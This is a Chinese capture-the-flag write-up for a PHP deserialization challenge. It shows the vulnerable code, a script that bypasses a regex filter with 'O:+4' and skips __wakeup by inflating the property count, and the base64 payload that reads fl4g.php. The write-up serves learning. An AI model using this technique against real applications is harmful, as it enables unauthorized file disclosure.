90，【6】攻防世界 WEB Web_php_unserialize

进入靶场

进入靶场

<?php 
// 定义一个名为 Demo 的类
class Demo { // 定义一个私有属性 $file，默认值为 'index.php'private $file = 'index.php';// 构造函数，当创建类的实例时会自动调用// 接收一个参数 $file，用于初始化对象的 $file 属性public function __construct($file) { $this->file = $file; }// 析构函数，当对象被销毁时自动调用// 使用 highlight_file 函数以高亮语法显示 $this->file 指定的文件内容// @ 符号用于抑制可能出现的错误信息// true 参数表示将高亮显示的内容作为字符串返回，而不是直接输出function __destruct() { echo @highlight_file($this->file, true); }// __wakeup 魔术方法，当对象被反序列化时自动调用// 该方法用于检查反序列化后的 $this->file 属性值// 如果 $this->file 不等于 'index.php'，则将其重置为 'index.php'// 注释中提示秘密在 fl4g.php 文件中function __wakeup() { if ($this->file != 'index.php') { //the secret is in the fl4g.php$this->file = 'index.php'; } } 
}
// 检查是否通过 GET 请求传递了名为 'var' 的参数
if (isset($_GET['var'])) { // 如果存在 'var' 参数，对其进行 Base64 解码$var = base64_decode($_GET['var']); // 使用正则表达式检查解码后的字符串中是否包含特定格式的字符串// /[oc]:\d+:/i 用于匹配以 'o' 或 'c' 开头，后面跟着一个冒号，再跟着一个或多个数字，最后再跟着一个冒号的字符串// i 修饰符表示不区分大小写if (preg_match('/[oc]:\d+:/i', $var)) { // 如果匹配到，则输出 'stop hacking!' 并终止脚本执行die('stop hacking!'); } else {// 如果没有匹配到，则尝试对解码后的字符串进行反序列化// @ 符号用于抑制可能出现的错误信息@unserialize($var); } 
} else { // 如果没有传递 'var' 参数，则以高亮语法显示当前文件（index.php）的内容highlight_file("index.php"); 
} 
?>

我们要绕过unserialize函数、preg—match函数、wakeup函数、解码函数

考点分析

• PHP 反序列化：理解 PHP 对象的序列化和反序列化机制，以及如何利用反序列化过程中调用的魔术方法（如 __destruct、__wakeup）来执行特定操作。
• 正则过滤绕过：代码中使用正则表达式 /[oc]:\d+:/i 对输入进行过滤，需要思考如何绕过这个过滤机制。
• 文件包含：通过控制 $file 属性的值，利用 highlight_file 函数读取目标文件内容。

解题思路

1. 构造序列化对象：创建一个 Demo 类的对象，并将 $file 属性设置为目标文件（如 fl4g.php），然后对该对象进行序列化。
2. 绕过 __wakeup 方法：__wakeup 方法会在反序列化时将 $file 属性重置为 index.php，需要找到绕过该方法的方法。
3. 绕过正则过滤：输入的序列化字符串不能包含正则表达式 /[oc]:\d+:/i 匹配的内容。
4. Base64 编码：将处理后的序列化字符串进行 Base64 编码，作为 var 参数传递给脚本。

php在线运行,在线工具，在线编译IDE_w3cschool

 

<?php
// 定义一个名为 Demo 的类
class Demo { // 定义一个私有属性 $file，初始值为 'fl4g.php'，此文件可能包含我们要找的 flag 信息private $file = 'fl4g.php';
}// 创建一个 Demo 类的实例，并对该实例进行序列化操作
// 序列化是将对象转换为一个字符串，以便于存储或传输
$a = serialize(new Demo);// 原代码中的正则表达式 /[oc]:\d+:/i 会匹配以 'o' 或 'c' 开头，后跟冒号、一个或多个数字，再跟冒号的字符串
// 这里将序列化字符串中的 'O:4' 替换为 'O:+4'，是为了绕过 preg_match() 函数的正则匹配
// 因为替换后的字符串不再符合正则表达式的匹配规则，从而避免被检测为恶意输入
$a = str_replace('O:4', 'O:+4',$a);// 在 PHP 反序列化时，如果对象的属性个数与序列化字符串中声明的属性个数不一致
// 且序列化字符串中声明的属性个数大于实际属性个数时，__wakeup() 魔术方法将不会被调用
// Demo 类实际只有一个属性，这里将序列化字符串中的 ':1:'（表示有 1 个属性）替换为 ':2:'
// 以此绕过 __wakeup() 方法，防止其将 $file 属性重置为 'index.php'
$a = str_replace(':1:', ':2:',$a);// 最后对处理后的序列化字符串进行 Base64 编码
// 因为原题目代码会对传入的 'var' 参数进行 Base64 解码操作
// 这样编码后得到的字符串可以作为 'var' 参数的值传递给原题目代码进行反序列化操作
echo base64_encode($a);
?>

 

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

笔记 

需要对序列化十分熟悉